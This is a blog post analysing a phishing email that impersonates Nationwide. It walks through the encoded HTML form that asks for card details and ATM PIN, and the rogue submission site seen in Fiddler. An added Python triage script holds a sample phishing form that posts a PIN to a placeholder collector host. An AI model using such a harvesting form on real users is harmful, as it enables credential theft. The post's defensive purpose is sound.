Phishing Email Example (@AskNationwide)

So, like most of you, I get lots of phishing emails, which normally get captured. I do, however, like to look at them and see what they are doing. The one I got today has so many things wrong with it that it was worth looking at.

As you can see, firstly the “From” name is different from the “Email” address it came from, or should I say the one it tells me it is from. For a financial organization not to use a valid domain for its email would be very rare. Secondly, we see an attachment in “HTML” format, which just would not happen. Normally, organizations like this would send a link to an online service or, in reality, if the activity was deemed suspicious, they would have called you by now. Lastly, we see instructions to complete the form, which of course is completely against any security policy.

So what does the form contain?

If we download the “HTML” file and open it up we see that it is encoded.

Of course we could take some time to see what it is doing by breaking open the encoded text, however it is much more fun to see what it looks like in the browser.

How good does that look?

If you hover on the links they all point to valid locations. An example would be the “Getting Started” link on the left which is pointing to the real site ““.

Notice the glaring issues with the form?

None of the details being asked for would be needed at all, except “maybe” as confirmation once you had logged back into your account first. I particularly like how the form asks for all the card details, including “ATM Pin”, which no financial institution would ever ask for. It then asks for personal details, which will help the attacker “pretend” to be you.

If we now press the “Continue” button with empty values, we see it even has validation. Notice that I can type whatever I want in those fields and they get confirmed, which in reality would not happen either. Most legitimate sites use some “on-the-fly” validation now to assist with this.

Now let’s press the “Continue” button after completing the details. We get a little message.

Using Fiddler, we can see that it sends some data to a site that is under the financial institution’s real sites.

However it also tries to submit the data to the following URL.

Once this piece is completed, it then redirects back to the valid website for “Nationwide”. Taking a closer look at the steps, you can see the flow.

  1. Existing Nationwide site
  2. Custom “Submission” site
  3. Existing Nationwide site

So what was submitted to the “Submission” site?

Using Fiddler, we can simply select the custom site URL and see the “POST” details. Using the “WebForms” view, we can see all of our data that was posted from the form.

It is sent in the URL as a “POST” request.

Using the “TextView” we can see the full “POST” URL.


So the word of warning here is to check and check again before you ever use a process like this. If you get an email that looks legit but you are not 100% sure, call the organization first to double-check; better to be safe than sorry.
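
The tells walked through above (a display name that does not match the sending domain, an HTML attachment, and a form that posts outside the organization's own site) can be checked statically, without opening the attachment in a browser. The following Python is an added example, not code from the original post; the brand name, every domain, the sample message and the assumption that the attachment hides its markup with `unescape('%3C...')` percent-encoding are constructed for illustration.

```python
import re
from email.message import EmailMessage
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import quote, unquote, urlparse

class FormActions(HTMLParser):
    def __init__(self):
        super().__init__()
        self.actions = []
    def handle_starttag(self, tag, attrs):
        if tag == "form":  # record where each form would submit its fields
            self.actions.append(dict(attrs).get("action") or "")

def in_domain(host, domain):
    return host.lower() == domain or host.lower().endswith("." + domain)

def triage(msg, brand, brand_domain):
    findings = []
    name, addr = parseaddr(str(msg["From"]))
    if brand.lower() in name.lower() and not in_domain(addr.rpartition("@")[2], brand_domain):
        findings.append(f"display name claims {brand} but address is {addr}")
    for part in msg.iter_attachments():
        if part.get_content_type() != "text/html":
            continue
        findings.append(f"HTML attachment {part.get_filename()}")
        raw = part.get_payload(decode=True).decode("utf-8", "replace")
        # Assumption: the markup is hidden as unescape('%3C...') percent-encoding.
        layers = [raw] + [unquote(s) for s in re.findall(r"unescape\(\s*['\"]([^'\"]+)", raw)]
        parser = FormActions()
        parser.feed("\n".join(layers))
        for action in parser.actions:
            host = urlparse(action).hostname
            if host and not in_domain(host, brand_domain):
                findings.append(f"form posts to off-brand host {host}")
    return findings

def build_sample():
    """Constructed message; every name and host is a placeholder."""
    msg = EmailMessage()
    msg["From"] = '"Example Bank" <support@mailer.example.net>'
    msg.set_content("Complete the attached form to restore access.")
    form = '<form method="post" action="http://collector.example.org/save.php"><input name="pin"></form>'
    html = "<html><script>document.write(unescape('%s'));</script></html>" % quote(form, safe="")
    msg.add_attachment(html.encode(), maintype="text", subtype="html", filename="form.html")
    return msg

if __name__ == "__main__":
    for finding in triage(build_sample(), "Example Bank", "bank.example"):
        print(finding)
```

Links inside such a page that point at the real site, as seen here, do not change the result: only the form's submission target is compared against the expected domain.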

Liam Cleary

Liam began his career as a Trainer of all things computer-related. He quickly realized that programming, breaking, and hacking was a lot more fun. He spent the next few years working within core infrastructure and security services until he found SharePoint. He is the founder and owner of SharePlicity, a consulting company that focuses on all areas of Technology. His role within SharePlicity is to help organizations implement technology that will enhance internal and external collaboration, document and records management, automate business processes, and of course security controls and protection. Liam also serves as the Principal Technology Advisor at Rencore, where he is helping to develop offerings that help organizations further understand and mitigate security and compliance risks within SharePoint and Office 365 customizations. His core focus is to identify, control, and protect, whether they are full-fledged customizations or out-of-the-box Office 365 functionality. He is also a thirteen-time Microsoft MVP focusing on Architecture but also crosses the boundary into Development. He is also a Microsoft Certified Trainer (MCT). His specialty over the past few years has been security in SharePoint and its surrounding platforms. He can often be found at user groups or conferences speaking, offering advice, spending time in the community, teaching his kids how to code, Raspberry Pi programming, hacking the planet or building Lego robots.
